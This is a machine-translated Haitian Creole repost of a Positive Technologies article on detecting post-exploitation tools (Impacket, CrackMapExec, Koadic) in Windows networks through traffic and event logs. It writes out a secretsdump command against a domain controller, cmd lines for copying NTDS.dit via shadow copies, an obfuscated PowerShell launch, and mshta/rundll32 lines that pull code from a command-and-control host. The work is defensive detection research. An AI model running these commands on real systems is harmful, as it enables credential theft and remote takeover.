ProHoster > Blog > Administrasyon an > Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate

Kantite atak nan sektè antrepriz la ap grandi chak ane: pou egzanp an 2017, yo te anrejistre 13% plis ensidan inik pase nan 2016, ak nan fen 2018 - 27% plis ensidanpase nan peryòd anvan an. Ki gen ladan sa yo kote zouti prensipal k ap travay la se sistèm operasyon Windows. Nan ane 2017-2018, APT Dragonfly, APT28, APT MuddyWater te fè atak sou gouvènman an ak òganizasyon militè an Ewòp, Amerik di Nò ak Arabi Saoudit. Epi nou te itilize twa zouti pou sa - Pake, CrackMapExec и Koadik. Kòd sous yo louvri epi li disponib sou GitHub.

Li se vo anyen ke zouti sa yo pa itilize pou premye pénétration, men yo devlope yon atak nan enfrastrikti a. Atakè yo sèvi ak yo nan diferan etap nan atak la apre pénétration nan perimèt la. Sa a, nan chemen an, se difisil a detekte e souvan sèlman avèk èd nan teknoloji idantifye tras konpwomi nan trafik rezo a oswa zouti ki pèmèt detekte aksyon aktif yon atakè apre li fin antre nan enfrastrikti a. Zouti yo bay yon varyete fonksyon, soti nan transfere fichye yo kominike avèk rejis la ak egzekite kòmandman sou yon machin aleka. Nou te fè yon etid sou zouti sa yo pou detèmine aktivite rezo yo.

Ki sa nou te bezwen fè:

  • Konprann ki jan zouti Hacking travay. Chache konnen ki sa atakè yo bezwen eksplwate ak ki teknoloji yo ka itilize.
  • Jwenn sa ki pa detekte pa zouti sekirite enfòmasyon nan premye etap yo nan yon atak. Faz rekonesans la ka sote, swa paske atakè a se yon atakè entèn, oswa paske atakè a ap eksplwate yon twou nan enfrastrikti a ki pa te deja konnen. Li vin posib retabli tout chèn nan aksyon l 'yo, pakonsekan dezi a yo detekte plis mouvman.
  • Elimine fo pozitif nan zouti deteksyon entrizyon. Nou pa dwe bliye ke lè sèten aksyon yo detekte sou baz rekonesans sèlman, erè souvan posib. Anjeneral nan enfrastrikti a gen yon kantite ase fason, ki pa distenge ak sa yo lejitim nan premye gade, jwenn nenpòt enfòmasyon.

Kisa zouti sa yo bay atakè yo? Si sa a se Impacket, Lè sa a, atakè yo resevwa yon bibliyotèk gwo nan modil ki ka itilize nan diferan etap nan atak la ki swiv apre kraze perimèt la. Anpil zouti itilize modil Impacket intern - pou egzanp, Metasploit. Li gen dcomexec ak wmiexec pou ekzekisyon kòmand aleka, secretsdump pou jwenn kont nan memwa ke yo ajoute nan Impacket. Kòm yon rezilta, deteksyon kòrèk nan aktivite a nan tankou yon bibliyotèk pral asire deteksyon an nan dérivés.

Se pa yon konyensidans ke kreyatè yo te ekri "Powered by Impacket" sou CrackMapExec (oswa tou senpleman CME). Anplis de sa, CME gen fonksyon ki pare pou senaryo popilè: Mimikatz pou jwenn modpas oswa hash yo, aplikasyon Meterpreter oswa ajan Empire pou ekzekisyon aleka, ak Bloodhound sou tablo.

Twazyèm zouti nou te chwazi a se te Koadic. Li se byen resan, li te prezante nan konferans entènasyonal pirate DEFCON 25 nan 2017 epi li distenge pa yon apwòch ki pa estanda: li travay atravè HTTP, Java Script ak Microsoft Visual Basic Script (VBS). Yo rele apwòch sa a k ap viv sou tè a: zouti a sèvi ak yon seri depandans ak bibliyotèk ki bati nan Windows. Kreyatè yo rele li COM Command & Control, oswa C3.

IMPACKET

Fonksyonalite Impacket a trè laj, sòti nan rekonesans andedan AD ak kolekte done ki soti nan sèvè MS SQL entèn yo, nan teknik pou jwenn kalifikasyon: sa a se yon atak relè SMB, ak jwenn dosye a ntds.dit ki gen hash nan modpas itilizatè nan yon kontwolè domèn. Impacket tou egzekite kòmandman adistans lè l sèvi avèk kat metòd diferan: WMI, Windows Scheduler Management Service, DCOM, ak SMB, epi li mande kalifikasyon pou fè sa.

Secretsdump

Ann pran yon gade nan secretsdump. Sa a se yon modil ki ka vize tou de machin itilizatè yo ak contrôleur domèn. Li ka itilize pou jwenn kopi zòn memwa LSA, SAM, SECURITY, NTDS.dit, kidonk li ka wè nan diferan etap nan atak la. Premye etap la nan operasyon modil la se otantifikasyon atravè SMB, ki mande swa modpas itilizatè a oswa hash li yo otomatikman pote soti nan Pass the Hash atak. Apre sa vini yon demann pou louvri aksè a Manadjè Kontwòl Sèvis (SCM) ak jwenn aksè nan rejis la atravè pwotokòl la winreg, lè l sèvi avèk ki yon atakè ka jwenn done yo nan branch nan enterè ak jwenn rezilta atravè SMB.

Nan Fig. 1 nou wè ki jan egzakteman lè w ap itilize pwotokòl winreg la, yo jwenn aksè lè l sèvi avèk yon kle rejis ak yon LSA. Pou fè sa, sèvi ak lòd DCERPC ak opcode 15 - OpenKey.

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate
Diri. 1. Louvri yon kle rejis lè l sèvi avèk pwotokòl winreg la

Apre sa, lè yo jwenn aksè nan kle a, valè yo sove ak lòd SaveKey ak opcode 20. Impacket fè sa nan yon fason trè espesifik. Li sove valè yo nan yon fichye ki gen non se yon seri 8 karaktè o aza ajoute ak .tmp. Anplis de sa, plis telechaje dosye sa a fèt atravè SMB nan anyè System32 (Fig. 2).

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate
Diri. 2. Plan pou jwenn yon kle rejis nan yon machin aleka

Li sanble ke aktivite sa yo sou rezo a ka detekte pa demann nan sèten branch rejis lè l sèvi avèk pwotokòl la winreg, non espesifik, kòmandman ak lòd yo.

Modil sa a kite tras tou nan jounal evènman Windows, sa ki fè li fasil pou detekte. Pou egzanp, kòm yon rezilta nan egzekite lòd la

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

Nan jounal Windows Server 2016 nou pral wè sekans kle evènman sa yo:

1. 4624 - aleka Logon.
2. 5145 - tcheke dwa aksè nan sèvis aleka winreg la.
3. 5145 - tcheke dwa aksè dosye nan anyè System32. Fichye a gen non o aza mansyone pi wo a.
4. 4688 - kreye yon pwosesis cmd.exe ki lanse vssadmin:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - kreye yon pwosesis ak kòmandman an:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - kreye yon pwosesis ak kòmandman an:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - kreye yon pwosesis ak kòmandman an:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

Tankou anpil zouti apre eksplwatasyon, Impacket gen modil pou egzekite kòmandman adistans. Nou pral konsantre sou smbexec, ki bay yon kokiy kòmand entèaktif sou yon machin aleka. Modil sa a mande tou otantifikasyon atravè SMB, swa ak yon modpas oswa yon hash modpas. Nan Fig. Nan Figi 3 nou wè yon egzanp ki jan yon zouti konsa travay, nan ka sa a se konsole administratè lokal la.

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate
Diri. 3. Interactive smbexec konsole

Premye etap la nan smbexec apre otantifikasyon se louvri SCM a ak lòd la OpenSCManagerW (15). Rekèt la remakab: jaden MachineName se DUMMY.

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate
Diri. 4. Mande pou louvri Manadjè Kontwòl Sèvis

Apre sa, sèvis la kreye lè l sèvi avèk lòd CreateServiceW (12). Nan ka smbexec, nou ka wè menm lojik konstriksyon lòd chak fwa. Nan Fig. 5 vèt endike paramèt kòmand ki pa chanje, jòn endike sa yon atakè ka chanje. Li fasil pou wè ke non fichye a ègzèkutabl, anyè li yo ak fichye pwodiksyon an ka chanje, men rès la se pi difisil pou chanje san yo pa deranje lojik modil la Impacket.

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate
Diri. 5. Mande pou kreye yon sèvis lè l sèvi avèk Manadjè Kontwòl Sèvis

Smbexec tou kite tras evidan nan jounal evènman Windows la. Nan Windows Server 2016 boutèy demi lit la pou koki kòmand entèaktif ak lòd ipconfig la, nou pral wè sekans kle evènman sa yo:

1. 4697 — enstalasyon sèvis la sou machin viktim nan:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - kreyasyon pwosesis cmd.exe ak agiman yo soti nan pwen 1.
3. 5145 - tcheke dwa aksè nan fichye __sorti a nan anyè C$ la.
4. 4697 — enstalasyon sèvis la sou machin viktim nan.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - kreyasyon pwosesis cmd.exe ak agiman yo soti nan pwen 4.
6. 5145 - tcheke dwa aksè nan fichye __sorti a nan anyè C$ la.

Impacket se baz pou devlopman zouti atak. Li sipòte prèske tout pwotokòl nan enfrastrikti Windows ak an menm tan an gen karakteristik pwòp li yo. Isit la yo se demann winreg espesifik, ak itilizasyon SCM API a ak fòmasyon kòmand karakteristik, ak fòma non dosye a, ak SMB pataje SYSTEM32.

CRACKMAPEXEC

Zouti CME a fèt sitou pou otomatize aksyon woutin sa yo ke yon atakè dwe fè pou avanse nan rezo a. Li pèmèt ou travay ansanm ak ajan anpi byen koni ak Meterpreter. Pou egzekite kòmandman an kachet, CME ka bouche yo. Sèvi ak Bloodhound (yon zouti rekonesans separe), yon atakè ka otomatize rechèch la pou yon sesyon administratè domèn aktif.

detèktiv

Bloodhound, kòm yon zouti otonòm, pèmèt pou rekonesans avanse nan rezo a. Li kolekte done sou itilizatè yo, machin, gwoup, sesyon epi li bay kòm yon script PowerShell oswa yon dosye binè. Yo itilize pwotokòl ki baze sou LDAP oswa SMB pou kolekte enfòmasyon. Modil entegrasyon CME a pèmèt Bloodhound telechaje nan machin viktim nan, kouri epi resevwa done yo kolekte apre ekzekisyon, kidonk otomatize aksyon nan sistèm nan epi fè yo mwens aparan. Koki grafik Bloodhound prezante done yo kolekte nan fòm graf, ki pèmèt ou jwenn chemen ki pi kout la soti nan machin atakè a nan administratè domèn nan.

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate
Diri. 6. Bloodhound Entèfas

Pou kouri sou machin viktim nan, modil la kreye yon travay lè l sèvi avèk ATSVC ak SMB. ATSVC se yon koòdone pou travay avèk Windows Task Scheduler. CME itilize fonksyon NetrJobAdd(1) li pou kreye travay sou rezo a. Yon egzanp sou sa modil CME voye yo montre nan Fig. 7: Sa a se yon apèl kòmand cmd.exe ak kòd obfuscate nan fòm agiman nan fòma XML.

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate
Fig.7. Kreye yon travay atravè CME

Apre travay la te soumèt pou ekzekisyon, machin viktim nan kòmanse Bloodhound tèt li, e sa ka wè nan trafik la. Modil la karakterize pa demann LDAP pou jwenn gwoup estanda, yon lis tout machin ak itilizatè nan domèn nan, epi jwenn enfòmasyon sou sesyon itilizatè aktif atravè demann SRVSVC NetSessEnum la.

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate
Diri. 8. Jwenn yon lis sesyon aktif yo atravè SMB

Anplis de sa, lanse Bloodhound sou machin yon viktim ak odit pèmèt akonpaye pa yon evènman ki gen ID 4688 (kreyasyon pwosesis) ak non pwosesis la. «C:WindowsSystem32cmd.exe». Ki sa ki remakab sou li yo se agiman yo liy lòd:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

Modil enum_avproducts la trè enteresan nan pwen de vi fonksyonalite ak aplikasyon. WMI pèmèt ou sèvi ak lang rechèch WQL pou rekipere done ki sòti nan divès objè Windows, ki se esansyèlman sa modil CME sa a itilize. Li jenere demann nan klas AntiSpywareProduct ak AntiМirusProduct sou zouti pwoteksyon ki enstale sou machin viktim nan. Yo nan lòd yo jwenn done ki nesesè yo, modil la konekte ak espas non rootSecurityCenter2, Lè sa a, jenere yon rechèch WQL epi li resevwa yon repons. Nan Fig. Figi 9 montre sa ki nan demann ak repons sa yo. Nan egzanp nou an, Windows Defender te jwenn.

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate
Diri. 9. Aktivite rezo modil enum_avproducts

Souvan, odit WMI (Trace WMI-Aktivite), nan ki gen evènman ou ka jwenn enfòmasyon itil sou demann WQL, ka enfim. Men, si li aktive, Lè sa a, si script enum_avproducts la kouri, yo pral sove yon evènman ki gen ID 11. Li pral genyen non itilizatè ki voye demann lan ak non an nan espas non rootSecurityCenter2.

Chak nan modil CME yo te gen pwòp zafè pa yo, kit se kesyon WQL espesifik oswa kreyasyon yon sèten kalite travay nan yon pwogramasyon travay ak obfuscation ak aktivite espesifik Bloodhound nan LDAP ak SMB.

KOADIK

Yon karakteristik diferan nan Koadic se itilizasyon entèprèt JavaScript ak VBScript ki te bati nan Windows. Nan sans sa a, li swiv k ap viv nan tandans tè a - se sa ki, li pa gen okenn depandans ekstèn epi li sèvi ak zouti estanda Windows. Sa a se yon zouti pou kòmandman ak kontwòl konplè (CnC), depi apre enfeksyon yon "enplantasyon" enstale sou machin nan, ki pèmèt li yo dwe kontwole. Yon machin konsa, nan tèminoloji Koadic, yo rele yon "zonbi." Si pa gen ase privilèj pou operasyon konplè sou bò viktim nan, Koadic gen kapasite pou ogmante yo lè l sèvi avèk teknik kontoune kont itilizatè (UAC bypass).

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate
Diri. 10. Koadik kokiy

Viktim nan dwe kòmanse kominikasyon ak sèvè Command & Control la. Pou fè sa, li bezwen kontakte yon URI deja prepare epi resevwa kò prensipal Koadic la lè l sèvi avèk youn nan stagers yo. Nan Fig. Figi 11 montre yon egzanp pou mshta stager la.

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate
Diri. 11. Inisyalize yon sesyon ak sèvè CnC la

Dapre varyab repons WS la, li vin klè ke ekzekisyon fèt atravè WScript.Shell, ak varyab STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE genyen enfòmasyon kle sou paramèt sesyon aktyèl la. Sa a se premye pè demann-repons nan yon koneksyon HTTP ak yon sèvè CnC. Demann ki vin apre yo dirèkteman gen rapò ak fonksyonalite modil yo rele (enplantasyon). Tout modil Koadic travay sèlman ak yon sesyon aktif ak CnC.

Mimikatz

Menm jan CME travay ak Bloodhound, Koadic travay ak Mimikatz kòm yon pwogram separe epi li gen plizyè fason pou lanse li. Anba a se yon pè demann-repons pou telechaje implant Mimikatz la.

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate
Diri. 12. Transfere Mimikatz pou Koadic

Ou ka wè ki jan fòma URI nan demann lan chanje. Kounye a li gen yon valè pou varyab csrf, ki responsab modil la chwazi a. Pa fè atansyon sou non li; Nou tout konnen ke CSRF anjeneral konprann yon fason diferan. Repons lan se te menm kò prensipal Koadic, kote yo te ajoute kòd ki gen rapò ak Mimikatz. Li se byen gwo, kidonk ann gade pwen kle yo. Isit la nou gen bibliyotèk Mimikatz kode nan base64, yon klas .NET seri ki pral enjekte li, ak agiman pou lanse Mimikatz. Rezilta ekzekisyon an transmèt sou rezo a nan tèks klè.

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate
Diri. 13. Rezilta nan kouri Mimikatz sou yon machin aleka

Exec_cmd

Koadic tou gen modil ki ka egzekite kòmandman adistans. Isit la nou pral wè menm metòd jenerasyon URI ak varyab sid ak csrf abitye yo. Nan ka modil la exec_cmd, kòd ajoute nan kò a ki kapab egzekite kòmandman koki. Anba a montre kòd sa yo ki nan repons HTTP sèvè CnC la.

Ki jan yo detekte atak sou enfrastrikti Windows: etidye zouti pirate
Diri. 14. Kòd implant exec_cmd

Varyab GAWTUUGCFI ak atribi WS abitye obligatwa pou ekzekisyon kòd. Avèk èd li, implant la rele koki a, trete de branch kòd - shell.exec ak retounen nan kouran done pwodiksyon ak shell.run san yo pa retounen.

Koadic se pa yon zouti tipik, men li gen pwòp zafè pa li yo ka jwenn li nan trafik lejitim:

  • fòmasyon espesyal nan demann HTTP,
  • lè l sèvi avèk winHttpRequests API,
  • kreye yon objè WScript.Shell atravè ActiveXObject,
  • gwo kò ègzekutabl.

Se stager la inisye koneksyon inisyal la, kidonk li posib pou detekte aktivite li atravè evènman Windows yo. Pou mshta, sa a se evènman 4688, ki endike kreyasyon yon pwosesis ak atribi kòmansman an:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

Pandan Koadic ap kouri, ou ka wè lòt evènman 4688 ak atribi ki parfe karakterize li:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

Jwenn

K ap viv nan tandans peyi a ap pran popilarite nan mitan kriminèl yo. Yo sèvi ak zouti ak mekanis ki bati nan Windows pou bezwen yo. Nou ap wè zouti popilè Koadic, CrackMapExec ak Impacket swiv prensip sa a de pli zan pli parèt nan rapò APT. Nimewo a nan fouchèt sou GitHub pou zouti sa yo ap grandi tou, ak nouvo yo ap parèt (genyen deja apeprè mil nan yo kounye a). Tandans la ap pran popilarite akòz senplisite li yo: atakè yo pa bezwen zouti twazyèm pati; yo deja sou machin viktim yo epi ede yo kontoune mezi sekirite yo. Nou konsantre sou etidye kominikasyon rezo a: chak zouti ki dekri pi wo a kite tras pwòp li yo nan trafik rezo a; etid detaye sou yo te pèmèt nou anseye pwodwi nou an Dekouvèt atak rezo PT detekte yo, ki finalman ede mennen ankèt sou tout ensidan cyber ki enplike yo.

Otè:

  • Anton Tyurin, Chèf Depatman Sèvis Ekspè, Sant Sekirite Ekspè PT, Teknoloji Pozitif
  • Egor Podmokov, ekspè, PT Ekspè Sekirite Sant, teknoloji pozitif

Sous: www.habr.com

Add nouvo kòmantè